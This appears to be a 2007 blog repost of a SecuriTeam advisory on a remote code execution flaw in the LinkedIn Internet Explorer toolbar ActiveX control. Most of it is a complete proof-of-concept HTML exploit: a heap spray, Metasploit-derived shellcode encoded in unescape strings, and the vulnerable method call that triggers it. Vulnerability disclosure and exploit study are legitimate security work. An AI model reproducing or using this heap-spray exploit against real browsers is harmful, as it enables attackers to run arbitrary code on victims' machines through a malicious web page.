Search This Blog

Tuesday, July 24, 2007

[EXPL] LinkedIn Toolbar (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

LinkedIn Toolbar (Exploit)
------------------------------------------------------------------------


SUMMARY

<http://www.linkedin.com/> LinkedIn is "a business oriented social
networking site, mainly used for professional networking". Vulnerability
in LinkedIn toolbar allows remote code execution on the client side.

DETAILS

Vulnerable Systems:
* LinkedInIEToolbar.dll version: 3.0.2.1098 (Tested on Windows XP SP2)

If a user using LinkedIn toolbar will be tricked into a website containing
this exploit, calc.exe application will pop.

Online PoC:
http://www.vdalabs.com/tools/IE7_LinkedIn_PoC.html

Exploit:
<HTML>
<TITLE>In God We Trust, VDA Labs, LLC</TITLE>
<HEAD>
<object classid='clsid:0F2437D6-C4E4-42CA-A906-F506E09354B7'
id='target'></object>
<script language='javascript'>

function repeat(n,c)
{
retval="";
for (i=0;i<n;i++)
retval = retval + c;
return retval
}

//EAX contains this value. call [eax]. that lands us on the nops.
blind_jmp = repeat(50000,unescape("%u0a0a%u0a0a"));

//shellcode: From metasploit.com. SC can be very big if you want.
shellcode =
unescape("%uc931%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%ub213%u28cd%u837b%ufceb%uf4e2%u254e%u7b6c%ucdb2%u3ea3%u468e%u7e54%uccca%uf0c7%ud5fd%u24a3%ucc92%u32c3%uf939%u7aa3%ufc5c%ue2e8%u491e%u0fe8%u0cb5%u76e2%u0fb3%u8fc3%u9989%u7f0c%u28c7%u24a3%ucc96%u1dc3%uc139%uf063%ud1ed%u9029%ud139%u7aa3%u4459%u5f74%u0eb6%ubb19%u46d6%u4b68%u0d37%u7750%u8d39%uf024%ud1c2%uf085%uc5da%u72c3%u4d39%u7b98%ucdb2%u13a3%u928e%u8d19%u9bd2%u83a1%u0d31%u2b53%ub3da%u99f0%ua5c1%u85b0%uc338%u847f%uae55%u1749%ue3d1%u034d%ucdd7%u7b28");

//changed to point to 0x0a0a0a0a
nops = repeat(3925, unescape("%u0a0a%u0a0a") ); //jmp +0, push eax, pop
eax

mem = new Array();
for(i=0; i<9000; i++)
{
mem[i] = nops+shellcode;
}

//make string
target.search("jared", blind_jmp);

</script>
</body>
</html>
<!-- text below generated by server. PLEASE REMOVE --><!--
Counter/Statistics data collection code --><script language="JavaScript"
src="http://hostingprod.com/js_source/geov2.js"></script><script
language="javascript">geovisit();</script><noscript><img
src="http://visit.webhosting.yahoo.com/visit.gif?us1185268672"
alt="setstats" border="0" width="1" height="1"></noscript>


ADDITIONAL INFORMATION

The information has been provided by VDA Labs.
The original article can be found at:
<http://www.vdalabs.com/tools/linkedin.html>

http://www.vdalabs.com/tools/linkedin.html

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: